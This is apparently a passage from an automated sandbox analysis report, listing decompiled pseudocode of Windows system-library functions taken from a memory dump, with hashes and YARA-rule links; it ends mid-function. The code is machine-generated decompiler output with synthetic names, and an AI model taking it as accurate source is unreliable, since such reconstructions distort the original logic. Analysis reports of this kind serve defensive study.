                                                                                                    0x00abd33f
                                                                                                    0x00abd349
                                                                                                    0x00000000
                                                                                                    0x00abd349

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @
                                                                                                    • API String ID: 0-2766056989
                                                                                                    • Opcode ID: 3b1ee7b9438f3d88ed7780ee086753a94ac59326fffdd5c3fc6da35523b3c260
                                                                                                    • Instruction ID: 7c5f255887e237192b46eaa24a9a61263b5428775c61722504e798e893e39636
                                                                                                    • Opcode Fuzzy Hash: 3b1ee7b9438f3d88ed7780ee086753a94ac59326fffdd5c3fc6da35523b3c260
                                                                                                    • Instruction Fuzzy Hash: F0319CB65083059FC311DF28C981AABBBECEB89754F10092EF9959B252E735DD04CB93
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00A91B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 72%
                                                                                                    			E00A91B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E00ACBB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E00ACA9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E00ACA9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L00AA4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                                                                    0x00a91b8f
                                                                                                    0x00a91b9a
                                                                                                    0x00a91b9c
                                                                                                    0x00a91b9e
                                                                                                    0x00a91ba3
                                                                                                    0x00ae7010
                                                                                                    0x00ae7010
                                                                                                    0x00000000
                                                                                                    0x00a91ba9
                                                                                                    0x00a91ba9
                                                                                                    0x00a91bae
                                                                                                    0x00000000
                                                                                                    0x00a91bc5
                                                                                                    0x00a91bca
                                                                                                    0x00a91bcf
                                                                                                    0x00a91bd0
                                                                                                    0x00a91bd1
                                                                                                    0x00a91bd2
                                                                                                    0x00a91bd6
                                                                                                    0x00a91bdc
                                                                                                    0x00a91be0
                                                                                                    0x00ae6ffc
                                                                                                    0x00ae7000
                                                                                                    0x00000000
                                                                                                    0x00ae7006
                                                                                                    0x00ae7009
                                                                                                    0x00ae7009
                                                                                                    0x00a91be6
                                                                                                    0x00a91bec
                                                                                                    0x00a91c0b
                                                                                                    0x00a91c0b
                                                                                                    0x00a91c0c
                                                                                                    0x00a91c11
                                                                                                    0x00a91c12
                                                                                                    0x00a91c15
                                                                                                    0x00a91c1b
                                                                                                    0x00a91c1f
                                                                                                    0x00a91c31
                                                                                                    0x00a91c33
                                                                                                    0x00ae7026
                                                                                                    0x00ae7026
                                                                                                    0x00a91c21
                                                                                                    0x00a91c24
                                                                                                    0x00a91c24
                                                                                                    0x00a91bee
                                                                                                    0x00a91bee
                                                                                                    0x00a91bf2
                                                                                                    0x00a91c3a
                                                                                                    0x00a91bf4
                                                                                                    0x00a91bf4
                                                                                                    0x00a91c05
                                                                                                    0x00a91c05
                                                                                                    0x00a91c09
                                                                                                    0x00a91c3e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00a91c09
                                                                                                    0x00a91bec
                                                                                                    0x00a91be0
                                                                                                    0x00a91bae
                                                                                                    0x00a91c2e

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: WindowsExcludedProcs
                                                                                                    • API String ID: 0-3583428290
                                                                                                    • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                                    • Instruction ID: 7649d1c3785b45ccac85b98af36745e36cb9d73a6ae1124108583220409a7591
                                                                                                    • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                                    • Instruction Fuzzy Hash: 9D21C277A41229ABCF229B5AD940F6FB7FDAF85B50F164825F9049B200DA34DD01D7A0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AAF716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E00AAF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                                                                                    0x00aaf71d
                                                                                                    0x00aaf722
                                                                                                    0x00aaf726
                                                                                                    0x00af4770
                                                                                                    0x00aaf765
                                                                                                    0x00aaf769
                                                                                                    0x00aaf769
                                                                                                    0x00aaf732
                                                                                                    0x00af477a
                                                                                                    0x00000000
                                                                                                    0x00af477a
                                                                                                    0x00aaf738
                                                                                                    0x00aaf73a
                                                                                                    0x00aaf73c
                                                                                                    0x00aaf73f
                                                                                                    0x00aaf746
                                                                                                    0x00aaf778
                                                                                                    0x00aaf7a9
                                                                                                    0x00aaf7a9
                                                                                                    0x00aaf754
                                                                                                    0x00aaf75a
                                                                                                    0x00aaf75d
                                                                                                    0x00aaf75f
                                                                                                    0x00aaf761
                                                                                                    0x00aaf76f
                                                                                                    0x00aaf771
                                                                                                    0x00aaf771
                                                                                                    0x00aaf76f
                                                                                                    0x00aaf763
                                                                                                    0x00000000
                                                                                                    0x00aaf763
                                                                                                    0x00aaf77d
                                                                                                    0x00aaf7a3
                                                                                                    0x00aaf7a5
                                                                                                    0x00000000
                                                                                                    0x00aaf7a5
                                                                                                    0x00aaf77f
                                                                                                    0x00aaf782
                                                                                                    0x00aaf784
                                                                                                    0x00aaf786
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00aaf788
                                                                                                    0x00aaf748
                                                                                                    0x00aaf74d
                                                                                                    0x00aaf78d
                                                                                                    0x00aaf793
                                                                                                    0x00aaf7b7
                                                                                                    0x00aaf7bc
                                                                                                    0x00000000
                                                                                                    0x00aaf7bc
                                                                                                    0x00aaf798
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00aaf79d
                                                                                                    0x00aaf7b0
                                                                                                    0x00000000
                                                                                                    0x00aaf7b0
                                                                                                    0x00aaf79f
                                                                                                    0x00000000
                                                                                                    0x00aaf74f
                                                                                                    0x00aaf74f
                                                                                                    0x00000000
                                                                                                    0x00aaf74f

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Actx
                                                                                                    • API String ID: 0-89312691
                                                                                                    • Opcode ID: aa8b871aa6c9ed9b6f9bd9a5df709e579884e36cfbfb05c7eed8a16049adad32
                                                                                                    • Instruction ID: af5261888b7928429676a23797b8f2f77e9cecee30e226d0a62d04822c818d36
                                                                                                    • Opcode Fuzzy Hash: aa8b871aa6c9ed9b6f9bd9a5df709e579884e36cfbfb05c7eed8a16049adad32
                                                                                                    • Instruction Fuzzy Hash: 7E118B35B046528FEB7C4F9D8890636B2A6AB97764F35453EE462CB3D1EB70CC408380
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00B38DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 71%
                                                                                                    			E00B38DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0xb60d50);
				E00ADD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E00B15720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = E00ADDEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				E00ADDEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E00ADD130(_t34, _t39, _t40);
			}





                                                                                                    0x00b38df1
                                                                                                    0x00b38df1
                                                                                                    0x00b38df1
                                                                                                    0x00b38df1
                                                                                                    0x00b38df1
                                                                                                    0x00b38df1
                                                                                                    0x00b38df3
                                                                                                    0x00b38df8
                                                                                                    0x00b38dfd
                                                                                                    0x00b38e00
                                                                                                    0x00b38e0e
                                                                                                    0x00b38e2a
                                                                                                    0x00b38e36
                                                                                                    0x00b38e38
                                                                                                    0x00b38e3c
                                                                                                    0x00b38e46
                                                                                                    0x00b38e46
                                                                                                    0x00b38e36
                                                                                                    0x00b38e50
                                                                                                    0x00b38e56
                                                                                                    0x00b38e59
                                                                                                    0x00b38e5c
                                                                                                    0x00b38e60
                                                                                                    0x00b38e67
                                                                                                    0x00b38e6d
                                                                                                    0x00b38e73
                                                                                                    0x00b38e74
                                                                                                    0x00b38eb1
                                                                                                    0x00b38ebd

                                                                                                    Strings
                                                                                                    • Critical error detected %lx, xrefs: 00B38E21
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Critical error detected %lx
                                                                                                    • API String ID: 0-802127002
                                                                                                    • Opcode ID: 12983b1dd9f954bb3feef07d64b5a5367a869568ba1ef1e5359b22a8d719b93b
                                                                                                    • Instruction ID: 3be993c91ec6ebdf116fd261bc19e828511b83832599fb60e49e289ce583fe8c
                                                                                                    • Opcode Fuzzy Hash: 12983b1dd9f954bb3feef07d64b5a5367a869568ba1ef1e5359b22a8d719b93b
                                                                                                    • Instruction Fuzzy Hash: F2113975D54348DADB25DFA4850679DBBF0FB04314F30429EE42A6B392CB740A01CF15
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00A8F900, Relevance: .9, Instructions: 863COMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 99%
                                                                                                    			E00A8F900(signed int _a4, signed int _a8) {
				signed char _v5;
				signed char _v6;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed char _t285;
				signed int _t289;
				signed char _t292;
				signed int _t293;
				signed char _t295;
				signed int _t300;
				signed int _t301;
				signed char _t306;
				signed char _t307;
				signed char _t308;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed char _t314;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t322;
				signed int _t323;
				signed int _t328;
				signed char _t329;
				signed int _t337;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				signed int _t348;
				signed char _t350;
				signed int _t351;
				signed char _t353;
				signed char _t356;
				signed int _t357;
				signed char _t359;
				signed int _t360;
				signed char _t363;
				signed int _t364;
				signed int _t366;
				signed int* _t372;
				signed char _t373;
				signed char _t378;
				signed int _t379;
				signed int* _t382;
				signed int _t383;
				signed char _t385;
				signed int _t387;
				signed int _t388;
				signed char _t390;
				signed int _t393;
				signed int _t395;
				signed char _t397;
				signed int _t401;
				signed int _t405;
				signed int _t407;
				signed int _t409;
				signed int _t410;
				signed int _t413;
				signed char _t415;
				signed int _t416;
				signed char _t418;
				signed int _t419;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed char* _t425;
				signed char _t426;
				signed char _t427;
				signed int _t428;
				signed int _t429;
				signed int _t431;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t452;
				signed int _t454;
				signed int _t455;
				signed int _t456;
				signed int _t457;
				signed int _t461;
				signed int _t462;
				signed int _t464;
				signed int _t467;
				signed int _t470;
				signed int _t474;
				signed int _t475;
				signed int _t477;
				signed int _t481;
				signed int _t483;
				signed int _t486;
				signed int _t487;
				signed int _t488;

				_t285 =  *(_a4 + 4);
				_t444 = _a8;
				_t452 =  *_t444;
				_t421 = _t285 & 1;
				if(_t421 != 0) {
					if(_t452 != 0) {
						_t452 = _t452 ^ _t444;
					}
				}
				_t393 =  *(_t444 + 4);
				if(_t421 != 0) {
					if(_t393 != 0) {
						_t393 = _t393 ^ _t444;
					}
				}
				_t426 = _t393;
				if(_t452 != 0) {
					_t426 = _t452;
				}
				_v5 = _t285 & 0x00000001;
				asm("sbb eax, eax");
				if((_t393 &  ~_t452) != 0) {
					_t289 = _t393;
					_t427 = _v5;
					_t422 = _t393;
					_v12 = _t393;
					_v16 = 1;
					if( *_t393 != 0) {
						_v16 = _v16 & 0x00000000;
						_t445 =  *_t393;
						goto L115;
						L116:
						_t289 = _t445;
						L117:
						_t445 =  *_t289;
						if(_t445 != 0) {
							L115:
							_t422 = _t289;
							if(_t427 != 0) {
								goto L183;
							}
							goto L116;
						} else {
							_t444 = _a8;
							_v12 = _t289;
							goto L27;
						}
						L183:
						if(_t445 == 0) {
							goto L116;
						}
						_t289 = _t289 ^ _t445;
						goto L117;
					}
					L27:
					if(_t427 != 0) {
						if(_t452 == 0) {
							goto L28;
						}
						_t428 = _t289 ^ _t452;
						L29:
						 *_t289 = _t428;
						_t429 =  *(_t452 + 8);
						_v20 = _t429;
						_t426 = _t429 & 0xfffffffc;
						_t292 =  *(_a4 + 4) & 0x00000001;
						_v6 = _t292;
						_t293 = _v12;
						if(_t292 != 0) {
							if(_t426 != 0) {
								_t426 = _t426 ^ _t452;
							}
						}
						if(_t426 != _t444) {
							L174:
							_t423 = 0x1d;
							asm("int 0x29");
							goto L175;
						} else {
							_t436 = _t293;
							if(_v6 != 0) {
								_t436 = _t436 ^ _t452;
							}
							_v20 = _v20 & 0x00000003;
							_v20 = _v20 | _t436;
							 *(_t452 + 8) = _v20;
							_t426 =  *(_t393 + 8) & 0xfffffffc;
							_t356 =  *(_a4 + 4) & 0x00000001;
							_v6 = _t356;
							_t357 = _v12;
							if(_t356 != 0) {
								if(_t426 != 0) {
									_t426 = _t426 ^ _t393;
								}
							}
							if(_t426 != _t444) {
								goto L174;
							} else {
								_t483 = _t393 ^ _t357;
								_v24 = _t483;
								if(_v6 == 0) {
									_v24 = _t357;
								}
								 *(_t393 + 8) =  *(_t393 + 8) & 0x00000003 | _v24;
								_t426 =  *(_t357 + 4);
								_t444 = _a8;
								_t359 =  *(_a4 + 4) & 0x00000001;
								_v6 = _t359;
								_t360 = _v12;
								_v24 = _t483;
								if(_t359 != 0) {
									_v24 = _t483;
									if(_t426 == 0) {
										goto L37;
									}
									_t426 = _t426 ^ _t360;
									L38:
									if(_v6 == 0) {
										_t483 = _t393;
									}
									_t413 =  *(_t360 + 8);
									 *(_t360 + 4) = _t483;
									_t452 = _t413 & 0xfffffffc;
									_v5 = _t413;
									_t363 =  *(_a4 + 4) & 0x00000001;
									_v6 = _t363;
									if(_t363 != 0) {
										_t364 = _v12;
										_v5 = _t413;
										if(_t452 == 0) {
											goto L41;
										}
										_v20 = _t452;
										_v20 = _v20 ^ _t364;
										L42:
										if(_v20 != _t422) {
											_v5 = _t413;
											if(_v6 == 0) {
												L199:
												_t366 = _v12;
												L200:
												if(_t452 != 0 || _t366 != _t422) {
													goto L174;
												} else {
													goto L43;
												}
											}
											_t366 = _v12;
											_v5 = _t413;
											if(_t452 == 0) {
												goto L199;
											}
											_t452 = _t452 ^ _t366;
											goto L200;
										}
										L43:
										_t486 =  *(_t444 + 8) & 0xfffffffc;
										if(_v6 != 0) {
											if(_t486 != 0) {
												_t486 = _t486 ^ _t444;
											}
											if(_v6 != 0 && _t486 != 0) {
												_t486 = _t486 ^ _t366;
											}
										}
										_t415 = _t413 & 0x00000003 | _t486;
										 *(_t366 + 8) = _t415;
										_t416 = _v12;
										 *(_t416 + 8) = ( *(_t444 + 8) ^ _t415) & 0x00000001 ^ _t415;
										_t452 =  *(_t444 + 8);
										_t372 = _a4;
										if((_t452 & 0xfffffffc) == 0) {
											if( *_t372 != _t444) {
												goto L174;
											} else {
												 *_t372 = _t416;
												goto L52;
											}
										} else {
											_t452 = _t452 & 0xfffffffc;
											_t378 = _t372[1] & 0x00000001;
											_v6 = _t378;
											if(_t378 != 0) {
												if(_t452 != 0) {
													_t452 = _t452 ^ _t444;
												}
											}
											_t379 =  *(_t452 + 4);
											if(_v6 != 0) {
												if(_t379 != 0) {
													_t379 = _t379 ^ _t452;
												}
											}
											_v24 = _t379;
											_t382 = _t452 + (0 | _v24 == _t444) * 4;
											_v28 = _t382;
											_t383 =  *_t382;
											if(_v6 != 0) {
												if(_t383 != 0) {
													_t383 = _t383 ^ _t452;
												}
											}
											if(_t383 != _t444) {
												goto L174;
											} else {
												if(_v6 != 0) {
													_t487 = _t452 ^ _t416;
												} else {
													_t487 = _t416;
												}
												 *_v28 = _t487;
												L52:
												_t373 = _v5;
												L12:
												_t452 = _a4;
												_v5 = _t373 & 0x00000001;
												if(( *(_t452 + 4) & 0x00000001) != 0) {
													if(_t426 == 0) {
														goto L13;
													}
													_t306 = _t422 ^ _t426;
													L14:
													_t444 = _v16;
													 *(_t422 + _t444 * 4) = _t306;
													if(_t426 != 0) {
														_t306 =  *(_t426 + 8) & 0xfffffffc;
														_t418 =  *(_t452 + 4) & 0x00000001;
														_v6 = _t418;
														_t419 = _v12;
														if(_t418 != 0) {
															if(_t306 != 0) {
																_t306 = _t306 ^ _t426;
															}
														}
														if(_t306 != _t419) {
															goto L174;
														} else {
															if(_v6 != 0) {
																if(_t422 != 0) {
																	_t422 = _t422 ^ _t426;
																}
															}
															 *(_t426 + 8) = _t422;
															L24:
															return _t306;
														}
													}
													if(_v5 != _t426) {
														goto L24;
													} else {
														_t395 = _t452;
														_t306 =  *(_t395 + 4);
														L17:
														_t446 = _t423;
														_t434 = _v16 ^ 0x00000001;
														_v24 = _t446;
														_v12 = _t434;
														_t452 =  *(_t423 + _t434 * 4);
														if((_t306 & 0x00000001) != 0) {
															if(_t452 == 0) {
																goto L18;
															}
															_t426 = _t452 ^ _t446;
															L19:
															if(( *(_t426 + 8) & 0x00000001) != 0) {
																_t310 =  *(_t426 + 8) & 0xfffffffc;
																_t444 = _t306 & 1;
																if(_t444 != 0) {
																	if(_t310 != 0) {
																		_t310 = _t310 ^ _t426;
																	}
																}
																if(_t310 != _t423) {
																	goto L174;
																} else {
																	if(_t444 != 0) {
																		if(_t452 != 0) {
																			_t452 = _t452 ^ _t423;
																		}
																	}
																	if(_t452 != _t426) {
																		goto L174;
																	} else {
																		_t452 =  *(_t423 + 8) & 0xfffffffc;
																		if(_t444 != 0) {
																			if(_t452 == 0) {
																				L170:
																				if( *_t395 != _t423) {
																					goto L174;
																				} else {
																					 *_t395 = _t426;
																					L140:
																					if(_t444 != 0) {
																						if(_t452 != 0) {
																							_t452 = _t452 ^ _t426;
																						}
																					}
																					 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t452;
																					_t300 =  *(_t426 + _v16 * 4);
																					if(_t444 != 0) {
																						if(_t300 == 0) {
																							goto L143;
																						}
																						_t300 = _t300 ^ _t426;
																						goto L142;
																					} else {
																						L142:
																						if(_t300 != 0) {
																							_t401 =  *(_t300 + 8);
																							_t452 = _t401 & 0xfffffffc;
																							if(_t444 != 0) {
																								if(_t452 != 0) {
																									_t452 = _t452 ^ _t300;
																								}
																							}
																							if(_t452 != _t426) {
																								goto L174;
																							} else {
																								if(_t444 != 0) {
																									_t481 = _t300 ^ _t423;
																								} else {
																									_t481 = _t423;
																								}
																								 *(_t300 + 8) = _t401 & 0x00000003 | _t481;
																								goto L143;
																							}
																						}
																						L143:
																						if(_t444 != 0) {
																							if(_t300 != 0) {
																								_t300 = _t300 ^ _t423;
																							}
																						}
																						 *(_t423 + _v12 * 4) = _t300;
																						_t454 = _t426;
																						if(_t444 != 0) {
																							_t455 = _t454 ^ _t423;
																							_t301 = _t455;
																						} else {
																							_t301 = _t423;
																							_t455 = _t454 ^ _t301;
																						}
																						 *(_t426 + _v16 * 4) = _t301;
																						_t395 = _a4;
																						if(_t444 == 0) {
																							_t455 = _t426;
																						}
																						 *(_t423 + 8) =  *(_t423 + 8) & 0x00000003 | _t455;
																						 *(_t426 + 8) =  *(_t426 + 8) & 0x000000fe;
																						 *(_t423 + 8) =  *(_t423 + 8) | 0x00000001;
																						_t426 =  *(_t423 + _v12 * 4);
																						_t306 =  *(_t395 + 4);
																						if((_t306 & 0x00000001) != 0) {
																							if(_t426 != 0) {
																								_t426 = _t426 ^ _t423;
																							}
																						}
																						_t446 = _v24;
																						goto L20;
																					}
																				}
																			}
																			_t452 = _t452 ^ _t423;
																		}
																		if(_t452 == 0) {
																			goto L170;
																		}
																		_t311 =  *(_t452 + 4);
																		if(_t444 != 0) {
																			if(_t311 != 0) {
																				_t311 = _t311 ^ _t452;
																			}
																		}
																		if(_t311 == _t423) {
																			if(_t444 != 0) {
																				L175:
																				_t295 = _t452 ^ _t426;
																				goto L169;
																			} else {
																				_t295 = _t426;
																				L169:
																				 *(_t452 + 4) = _t295;
																				goto L140;
																			}
																		} else {
																			_t312 =  *_t452;
																			if(_t444 != 0) {
																				if(_t312 != 0) {
																					_t312 = _t312 ^ _t452;
																				}
																			}
																			if(_t312 != _t423) {
																				goto L174;
																			} else {
																				if(_t444 != 0) {
																					_t314 = _t452 ^ _t426;
																				} else {
																					_t314 = _t426;
																				}
																				 *_t452 = _t314;
																				goto L140;
																			}
																		}
																	}
																}
															}
															L20:
															_t456 =  *_t426;
															_t307 = _t306 & 0x00000001;
															if(_t456 != 0) {
																if(_t307 != 0) {
																	_t456 = _t456 ^ _t426;
																}
																if(( *(_t456 + 8) & 0x00000001) == 0) {
																	goto L21;
																} else {
																	L56:
																	_t461 =  *(_t426 + _v12 * 4);
																	if(_t307 != 0) {
																		if(_t461 == 0) {
																			L59:
																			_t462 = _v16;
																			_t444 =  *(_t426 + _t462 * 4);
																			if(_t307 != 0) {
																				if(_t444 != 0) {
																					_t444 = _t444 ^ _t426;
																				}
																			}
																			 *(_t444 + 8) =  *(_t444 + 8) & 0x000000fe;
																			_t452 = _t462 ^ 0x00000001;
																			_t405 =  *(_t395 + 4) & 1;
																			_t316 =  *(_t444 + 8) & 0xfffffffc;
																			_v28 = _t405;
																			_v24 = _t452;
																			if(_t405 != 0) {
																				if(_t316 != 0) {
																					_t316 = _t316 ^ _t444;
																				}
																			}
																			if(_t316 != _t426) {
																				goto L174;
																			} else {
																				_t318 = _t452 ^ 0x00000001;
																				_v32 = _t318;
																				_t319 =  *(_t426 + _t318 * 4);
																				if(_t405 != 0) {
																					if(_t319 != 0) {
																						_t319 = _t319 ^ _t426;
																					}
																				}
																				if(_t319 != _t444) {
																					goto L174;
																				} else {
																					_t320 =  *(_t423 + _t452 * 4);
																					if(_t405 != 0) {
																						if(_t320 != 0) {
																							_t320 = _t320 ^ _t423;
																						}
																					}
																					if(_t320 != _t426) {
																						goto L174;
																					} else {
																						_t322 =  *(_t426 + 8) & 0xfffffffc;
																						if(_t405 != 0) {
																							if(_t322 != 0) {
																								_t322 = _t322 ^ _t426;
																							}
																						}
																						if(_t322 != _t423) {
																							goto L174;
																						} else {
																							_t464 = _t423 ^ _t444;
																							_t323 = _t464;
																							if(_t405 == 0) {
																								_t323 = _t444;
																							}
																							 *(_t423 + _v24 * 4) = _t323;
																							_t407 = _v28;
																							if(_t407 != 0) {
																								if(_t423 != 0) {
																									L72:
																									 *(_t444 + 8) =  *(_t444 + 8) & 0x00000003 | _t464;
																									_t328 =  *(_t444 + _v24 * 4);
																									if(_t407 != 0) {
																										if(_t328 == 0) {
																											L74:
																											if(_t407 != 0) {
																												if(_t328 != 0) {
																													_t328 = _t328 ^ _t426;
																												}
																											}
																											 *(_t426 + _v32 * 4) = _t328;
																											_t467 = _t426 ^ _t444;
																											_t329 = _t467;
																											if(_t407 == 0) {
																												_t329 = _t426;
																											}
																											 *(_t444 + _v24 * 4) = _t329;
																											if(_v28 == 0) {
																												_t467 = _t444;
																											}
																											_t395 = _a4;
																											_t452 = _t426;
																											 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t467;
																											_t426 = _t444;
																											L80:
																											 *(_t426 + 8) =  *(_t426 + 8) ^ ( *(_t426 + 8) ^  *(_t423 + 8)) & 0x00000001;
																											 *(_t423 + 8) =  *(_t423 + 8) & 0x000000fe;
																											 *(_t452 + 8) =  *(_t452 + 8) & 0x000000fe;
																											_t337 =  *(_t426 + 8) & 0xfffffffc;
																											_t444 =  *(_t395 + 4) & 1;
																											if(_t444 != 0) {
																												if(_t337 != 0) {
																													_t337 = _t337 ^ _t426;
																												}
																											}
																											if(_t337 != _t423) {
																												goto L174;
																											} else {
																												_t339 =  *(_t423 + _v12 * 4);
																												if(_t444 != 0) {
																													if(_t339 != 0) {
																														_t339 = _t339 ^ _t423;
																													}
																												}
																												if(_t339 != _t426) {
																													goto L174;
																												} else {
																													_t452 =  *(_t423 + 8) & 0xfffffffc;
																													if(_t444 != 0) {
																														if(_t452 == 0) {
																															L160:
																															if( *_t395 != _t423) {
																																goto L174;
																															} else {
																																 *_t395 = _t426;
																																L93:
																																if(_t444 != 0) {
																																	if(_t452 != 0) {
																																		_t452 = _t452 ^ _t426;
																																	}
																																}
																																_t409 = _v16;
